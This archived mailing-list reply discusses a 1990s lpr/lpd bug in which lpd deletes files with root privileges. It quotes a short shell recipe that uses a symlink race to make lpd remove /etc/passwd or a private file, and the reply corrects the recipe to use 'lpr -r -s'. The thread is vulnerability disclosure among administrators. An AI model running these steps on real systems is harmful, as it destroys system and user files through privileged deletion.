Re: [Linux-ISP] lpr(1) bug

[zblaxell () MIRANDA UWATERLOO CA (Zygo Blaxell)]

Quoted from Cy Schubert - BCSC Open Systems Group:
> > The problem is that lpr/lpd invokes unlink() with super-user privileges.
> > Consider:
> >
> >     mkdir /tmp/foobar
> >     ln -s /etc/passwd /tmp/foobar
> >     lpr big_huge_file
> >     lpr -r /tmp/foobar/passwd
> >
> >     rm -rf /tmp/foobar ; ln -s /etc /tmp/foobar
> > OR  ln -fs /home/private_file /tmp/foobar/passwd # Does this work?
> >
> > /etc/passwd goes away.
>
> I tried this on my Infomagic Slackware 2.2 and /etc/passwd (actually /etc/foo)
> was still there, e.g. I couldn't recreate the problem.  The source code for
> lpr/lpd, part of NetKit-B-0.5 had the Berkeley copyright notice on it.  Are we
> talking about a different lpr/lpd daemon?  If we are talking about the same
> lpr/lpd as in NetKit-B-0.5, and if this only occurs during a race condition that
> has been mentioned in previous posts, this problem should be realized on any BSD
> based system.

Errr...oops.  That should be 'lpr -r -s' instead of 'lpr'.  There is a
race condition in lpr 'lpr -r' as well, but it's harder to exploit.

--
Zygo Blaxell, former sysadmin and current software/hardware guru for the
University of Waterloo Computer Science Club; current sysadmin for miranda.
uwaterloo.ca and ezmail.com.  10th place team, ACM Intl Finals Programming
Contest 1994.  Will administer Unix (esp. Linux, maybe Solaris) for food.